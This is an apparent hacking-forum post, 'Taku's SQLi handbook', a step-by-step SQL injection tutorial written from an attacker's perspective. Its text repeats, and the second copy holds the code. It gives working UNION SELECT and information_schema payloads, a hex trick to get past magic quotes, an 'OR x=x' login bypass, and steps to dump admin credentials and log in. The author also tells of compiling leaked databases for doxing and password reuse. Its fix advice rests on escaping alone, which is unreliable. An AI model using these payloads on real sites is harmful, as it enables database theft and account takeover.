Taku's SQLi handbook 05-27-2015, 03:38 PM
#1
Introduction
I couldn't find any SQL injection tutorials on here, so I decided to create one.
I know that this is probably going to be posted in the PHP and SQL Injection Attack Preventions section, but this tutorial is not just going to be about how to protect yourself.<t
In order for you to really understand how it works you have to think like an attacker, and that's why I'm going to explain this in the perspective of a malicious hacker.
This handbook is just for educational purposes, and I do not take responsibility for anything stupid you might do with the information I'm about to give you.
What is SQLi?
SQLi, or SQL injections are vulnerabilities that occur when user-input is not sanitized, and then read as a complete SQL query.
Keep in mind that this is just a brief explanation, there's a number of other ways to successfully do SQL injections, through forms, search boxes, and the list just goes on.
For instance, let's take this example. You have a website where you want to grab text from an SQL database and dump it on the screen of your website.
URL:
Code:
As we can see here the ID is a variable, and is shown in the URL too.
If you were to change ID to 2, it'll go into the database, select the text from the table news where the ID is 2.
Now, this is how it's supposed to work. However, if we put a single quote at the end of the URL like this:
The code will now look like this:
Now, because this quote is not sanitized correctly, it messes up the whole SQL query and it'll result in the website showing an SQL error on the site, like this:
This means that you can actually run SQL in the database, meaning you can SELECT (Select tables), INSERT (Add), UPDATE (Editing), DELETE (Deletes data, but keeps the table structure), DROP (Removes data and table structure).
Usually what people are after when doing this is to get their fingers on sensitive information like usernames, passwords, emails, SSNs, or anything else of that nature.
Manual SQL Injection
This is when we use the SQL errors to our advantage to retrieve information from the database.
To do this we have to have a vulnerable website, I'll use http://www.website.com/ that I used in the example above.
So, we already know it's vulnerable because we get the SQL error by adding a single-quote.
Now we're going to inject this SQL query with our own SQL code, trying to find the right amount of columns.
First we're going to try this:
Just keep doing this until you find the right amount of columns.
Now when we have the amount of columns we are going to use union to find the vulnerable columns.
We do this by entering this in the URL:
If you got a 3 on the target site for example, you're going to put this in your URL.
Now you should hopefully have the database name, copy and paste this somewhere - you're going to need this.
Next you want to get the table names. You can do this by entering this in the URL.
This will give you the different table names. Here you'll look for sensitive information like "login", "admin", "customers", etc. Really anyhing that can be to your interest. If it's a target website you might aswell dump the whole database's tables.
After you've found the one you want to look further into, like "admin", go ahead and write this in the URL. This will find the column names.
Please note that you have to change "admin" to whatever table name you're looking for. This could be anything really, even in different languages if your target is not in English.
Note: If this does not work and you get an error, it means that the server has Magic Quotes on.
To bypass this you can use any hex/char converter, I like to use http://www.swingnote.com/tools/texttohex.php for this.
Just copy the name of the table you're trying to get the columns from, paste the name in the "Say hello to my little friend" box and press "Convert".
Now copy the hex string and replace that with table name in the URL. Make sure you add "0x" in the beginning of your hex string.
This tells the server that the following characters/numbers written are a part of a hex string.
Your URL should look something like this now.
Now you should see a list of usernames, passwords, emails, IDs, MD5 hashes or anything else that can be interesting that's one of the columns.
Now we are almost finished. Now you just have to find the data of the columns you want to see.
Let's say I want to see the data of usernames, passwords and emails and that my database name that I found earlier was "sql_database". This is where the database name comes in handy!
Type this in the URL.
In this string "0x3a" is actually the hex of a colon (:).
We add this so we can see the data a little easier. It'll group the data together like so: username:password:email.
Now, if you've done everything correctly you should have the admin username, password and email. Save this somewhere and use it to log in.
Sometimes the admin page is hidden on websites, so you might have to run different perl/python scripts to find it. Basically what it'll do is to go through common directories and files to find an admin page.
I suggest using Cyb3rw0rms perl admin finder. It goes through a lot of different catagories, and you're bound to find a file with some luck.
admin.perl
How to fix SQL Injection & security tips
What we've learnt so far is that SQL Injection occur when user-input is not sanitized, and then ran in SQL queries.
Let's imagine some code looking like this.
If I were to enter, let's say "Josh" as a username and "Josh123" as password it would result in the script looking like this:
Right, that's okay, but if I write "anything' OR 'x'='x" as username and password it'll end up looking like this;
Basically what this means is that the 'x'='x' means that whatever they wrote in before that, it's going to be true.
This means that they will successfully bypass the login page.
You should have a good sense of how this works now. What we want to do is turn the sanitized user-input and make it so the PHP script will not take it literally and let SQL code get ran.
This is a part of a safe PHP script. It's using the function "mysql_real_escape_string" which will escape every special character and make it safe.
What they're doing here is to define the variable user and password to the function mysql_real_escape_string.
Now when you've had your vulnerabilities fixed there's still some things to do that could help you out.
If you by any chance have missed ANY SQL Injection vulnerabilities on your website, you're in big trouble.
For a whitehat you just have to fail once for an attacker to get your database, while the blackhat has all the time in his world to wait for you to make a mistake.
What I like to do is to change the name of admin panels to something that admin finders wont pick up. I also like to play around with my table names, changing the table name of "admin" to something unrelated would be a good idea.
SQLi defenses as a user
Since websites are becoming more and more interactive, SQL databases in websites are increasing - and that means that SQL Injections are too.
I've seen a lot of big websites have their databases dropped and dumped on the internet, and some databases are even kept private.
When a database is dropped a lot of users are re-using their passwords if they're stored in plaintext, and can be found by doxers easily.
Let's say someone dropped the database of a famous booter. If you signed up there, your registration IP will be stored, your last IP used, usernames, passwords, emails and a lot of other scary stuff.
If they're dropped you can search for their username in databases and hopefully find their old passwords, re-user them on any other website and access their accounts.
Infact, some years ago I made a little project with some of my friends. We compiled a lot of databases of famous websites, and made a simple PHP script to quickly search through all the databases looking for similar IPs or usernames, and most of the time we'd find a password or two that we could use in dox or even re-use on other accounts.
I've been hacked twice over the years of my hacking, and both of them were the simple mistake of reusing passwords, which is pretty funny.
Basically what I'm telling you is not to re-use passwords on any accounts, and consider signing up with different alises, emails or use VPNs.
Last words
This goes with any tutorial, feel free to ask any questions or just give your opinion on this tutorial.
Thanks for reading.
I couldn't find any SQL injection tutorials on here, so I decided to create one.
I know that this is probably going to be posted in the PHP and SQL Injection Attack Preventions section, but this tutorial is not just going to be about how to protect yourself.<t
In order for you to really understand how it works you have to think like an attacker, and that's why I'm going to explain this in the perspective of a malicious hacker.
This handbook is just for educational purposes, and I do not take responsibility for anything stupid you might do with the information I'm about to give you.
What is SQLi?
SQLi, or SQL injections are vulnerabilities that occur when user-input is not sanitized, and then read as a complete SQL query.
Keep in mind that this is just a brief explanation, there's a number of other ways to successfully do SQL injections, through forms, search boxes, and the list just goes on.
For instance, let's take this example. You have a website where you want to grab text from an SQL database and dump it on the screen of your website.
URL:
Code:
http://www.website.com/news.php?id=1Code:
select title, text from news where id=$idIf you were to change ID to 2, it'll go into the database, select the text from the table news where the ID is 2.
Now, this is how it's supposed to work. However, if we put a single quote at the end of the URL like this:
Code:
http://www.website.com/news.php?id=1'Code:
select title, text from news where id=1'Code:
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1Usually what people are after when doing this is to get their fingers on sensitive information like usernames, passwords, emails, SSNs, or anything else of that nature.
Manual SQL Injection
This is when we use the SQL errors to our advantage to retrieve information from the database.
To do this we have to have a vulnerable website, I'll use http://www.website.com/ that I used in the example above.
So, we already know it's vulnerable because we get the SQL error by adding a single-quote.
Now we're going to inject this SQL query with our own SQL code, trying to find the right amount of columns.
First we're going to try this:
Quote:http://www.website.com/news.php?id=1 order by 10--If we didn't get an error, we can increase 10, to - let's say 15.
Quote:http://www.website.com/news.php?id=1 order by 15--If we did have an SQL error saying "Unknown column '15' in 'order clause'" we have to decrease it.
Just keep doing this until you find the right amount of columns.
Quote:http://www.website.com/news.php?id=1 order by 11-- // No Error
Quote:http://www.website.com/news.php?id=1 order by 12-- // No Error
Quote:http://www.website.com/news.php?id=1 order by 13-- // No Error
Quote:http://www.website.com/news.php?id=1 order by 14-- // ErrorBecause we received an error at 14, we know that the right amount of columns are 13.
Now when we have the amount of columns we are going to use union to find the vulnerable columns.
We do this by entering this in the URL:
Quote:http://www.website.com/news.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--Please note that you are going to change the numbers depending on how many columns you had, so if you had 7 columns on your target your URL would be:
Quote:http://www.website.com/news.php?id=-1 union select 1,2,3,4,5,6,7--If it's working you should see some numbers on your targets website. These are the vulnerable columns.
If you got a 3 on the target site for example, you're going to put this in your URL.
Quote:http://www.website.com/news.php?id=-1 union select 1,2,group_concat(schema_name),4,5,6,7 from information_schema.schemata--You basically just replace one of the numbers of the vulnerable columns with group_concat(schema_name), and make sure to add from information_schema.schemata-- after the URL.
Now you should hopefully have the database name, copy and paste this somewhere - you're going to need this.
Next you want to get the table names. You can do this by entering this in the URL.
Code:
http://www.website.com/news.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--After you've found the one you want to look further into, like "admin", go ahead and write this in the URL. This will find the column names.
Code:
http://www.website.com/news.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin"--Note: If this does not work and you get an error, it means that the server has Magic Quotes on.
To bypass this you can use any hex/char converter, I like to use http://www.swingnote.com/tools/texttohex.php for this.
Just copy the name of the table you're trying to get the columns from, paste the name in the "Say hello to my little friend" box and press "Convert".
Now copy the hex string and replace that with table name in the URL. Make sure you add "0x" in the beginning of your hex string.
This tells the server that the following characters/numbers written are a part of a hex string.
Your URL should look something like this now.
Code:
http://www.website.com/news.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--Now we are almost finished. Now you just have to find the data of the columns you want to see.
Let's say I want to see the data of usernames, passwords and emails and that my database name that I found earlier was "sql_database". This is where the database name comes in handy!
Type this in the URL.
Code:
http://www.website.com/news.php?id=-1 UNION SELECT 1,group_concat(usernames,0x3a,passwords,0x3a,emails),3,4 FROM sql_database.Admin--We add this so we can see the data a little easier. It'll group the data together like so: username:password:email.
Now, if you've done everything correctly you should have the admin username, password and email. Save this somewhere and use it to log in.
Sometimes the admin page is hidden on websites, so you might have to run different perl/python scripts to find it. Basically what it'll do is to go through common directories and files to find an admin page.
I suggest using Cyb3rw0rms perl admin finder. It goes through a lot of different catagories, and you're bound to find a file with some luck.
admin.perl
Spoiler:
How to fix SQL Injection & security tips
What we've learnt so far is that SQL Injection occur when user-input is not sanitized, and then ran in SQL queries.
Let's imagine some code looking like this.
Code:
SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password'Code:
SELECT id
FROM logins
WHERE username = 'Josh'
AND password = 'Josh123'Code:
SELECT id
FROM logins
WHERE username = 'anything' OR 'x'='x'
AND password = 'anything' OR 'x'='x'This means that they will successfully bypass the login page.
You should have a good sense of how this works now. What we want to do is turn the sanitized user-input and make it so the PHP script will not take it literally and let SQL code get ran.
This is a part of a safe PHP script. It's using the function "mysql_real_escape_string" which will escape every special character and make it safe.
Code:
$query = sprintf("SELECT * FROM users WHERE user='%s' AND password='%s'",
mysql_real_escape_string($user),
mysql_real_escape_string($password));
?>Now when you've had your vulnerabilities fixed there's still some things to do that could help you out.
If you by any chance have missed ANY SQL Injection vulnerabilities on your website, you're in big trouble.
For a whitehat you just have to fail once for an attacker to get your database, while the blackhat has all the time in his world to wait for you to make a mistake.
What I like to do is to change the name of admin panels to something that admin finders wont pick up. I also like to play around with my table names, changing the table name of "admin" to something unrelated would be a good idea.
SQLi defenses as a user
Since websites are becoming more and more interactive, SQL databases in websites are increasing - and that means that SQL Injections are too.
I've seen a lot of big websites have their databases dropped and dumped on the internet, and some databases are even kept private.
When a database is dropped a lot of users are re-using their passwords if they're stored in plaintext, and can be found by doxers easily.
Let's say someone dropped the database of a famous booter. If you signed up there, your registration IP will be stored, your last IP used, usernames, passwords, emails and a lot of other scary stuff.
If they're dropped you can search for their username in databases and hopefully find their old passwords, re-user them on any other website and access their accounts.
Infact, some years ago I made a little project with some of my friends. We compiled a lot of databases of famous websites, and made a simple PHP script to quickly search through all the databases looking for similar IPs or usernames, and most of the time we'd find a password or two that we could use in dox or even re-use on other accounts.
I've been hacked twice over the years of my hacking, and both of them were the simple mistake of reusing passwords, which is pretty funny.
Basically what I'm telling you is not to re-use passwords on any accounts, and consider signing up with different alises, emails or use VPNs.
Last words
This goes with any tutorial, feel free to ask any questions or just give your opinion on this tutorial.
Thanks for reading.
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)